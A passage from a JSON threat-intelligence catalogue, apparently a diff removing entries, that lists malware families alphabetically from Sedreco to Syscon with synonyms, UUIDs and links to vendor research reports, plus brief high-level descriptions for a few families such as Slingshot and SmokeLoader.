"https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" - ] - }, - "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "" - }, - { - "meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "downrage", - "carberplike" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", - "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" - ] - }, - "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" - ] - }, - "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" - ] - }, - "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "" - }, - { - "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] - }, - "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] - }, - "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - }, - "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", - "value": "SHAPESHIFT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", - "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - }, - "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bitrep" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", - "https://eromang.zataz.com/tag/agentbase-exe/" - ] - }, - "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", - "value": "SHARPKNOT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", - "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] - }, - "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] - }, - "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] - }, - "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", - "http://www.nyxbone.com/malware/chineseRansom.html" - ] - }, - "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] - }, - "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", - "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", - "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", - "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", - "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", - "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", - "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" - ] - }, - "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", - "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", - "https://s.tencent.com/research/report/479.html" - ] - }, - "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", - "value": "win.sidewinder", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Destover" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] - }, - "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" - ] - }, - "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", - "value": "Siggen6", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", - "https://securelist.com/the-silence/83009/", - "http://www.intezer.com/silenceofthemoles/", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" - ] - }, - "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" - ] - }, - "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", - "value": "Siluhdur", - "description": "" - }, - { - "meta": { - "synonyms": [ - "iBank" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", - "https://secrary.com/ReversingMalware/iBank/" - ] - }, - "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Theola", - "Quarian", - "Mebroot", - "Anserin", - "Torpig" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", - "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", - "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" - ] - }, - "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", - "value": "Sinowal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", - "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" - ] - }, - "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", - "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] - }, - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" - ] - }, - "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", - "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" - ] - }, - "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", - "value": "Slave", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", - "https://securelist.com/apt-slingshot/84312/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] - }, - "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" - }, - { - "meta": { - "synonyms": [ - "speccom" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] - }, - "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Dofoil" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", - "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" - ] - }, - "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", - "value": "SmokeLoader", - "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." - }, - { - "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - }, - "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", - "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", - "https://twitter.com/VK_Intel/status/898549340121288704", - "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", - "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" - ] - }, - "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", - "value": "SnatchLoader", - "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." - }, - { - "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - }, - "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] - }, - "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", - "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] - }, - "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" - ] - }, - "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] - }, - "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", - "value": "Sobaken", - "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" - ] - }, - "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BIRDDOG", - "Nadrac" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] - }, - "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", - "value": "SocksBot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Napolar" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", - "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" - ] - }, - "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", - "value": "Solarbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", - "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", - "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" - ] - }, - "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", - "value": "soraya", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] - }, - "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", - "value": "Sorgu", - "description": "" - }, - { - "meta": { - "synonyms": [ - "denis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] - }, - "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": "SOUNDBITE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", - "value": "Spedear", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", - "http://malware-traffic-analysis.net/2017/01/17/index2.html", - "https://github.com/MinervaLabsResearch/SporaVaccination", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" - ] - }, - "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" - ] - }, - "uuid": "34e9d701-22a1-4315-891d-443edd077abf", - "value": "SpyBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" - ] - }, - "uuid": "", - "value": "", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] - }, - "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", - "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", - "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] - }, - "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", - "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" - ] - }, - "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", - "value": "Stampedo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", - "https://securelist.com/operation-daybreak/75100/" - ] - }, - "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - }, - "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", - "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] - }, - "uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" - ] - }, - "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" - ] - }, - "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", - "value": "Stration", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", - "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", - "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", - "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" - ] - }, - "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", - "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", - "https://twitter.com/physicaldrive0/status/786293008278970368", - "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", - "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" - ] - }, - "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", - "value": "StrongPity", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] - }, - "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", - "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] - }, - "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" - ] - }, - "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", - "value": "SuppoBox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - }, - "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "" - }, - { - "meta": { - "synonyms": [ - "getkys" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", - "https://www.symantec.com/connect/blogs/sykipot-attacks", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", - "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", - "https://community.rsa.com/thread/185437" - ] - }, - "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", - "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] - }, - "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", - "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] - }, - "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" - ] - }, - "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": "Synth Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", - 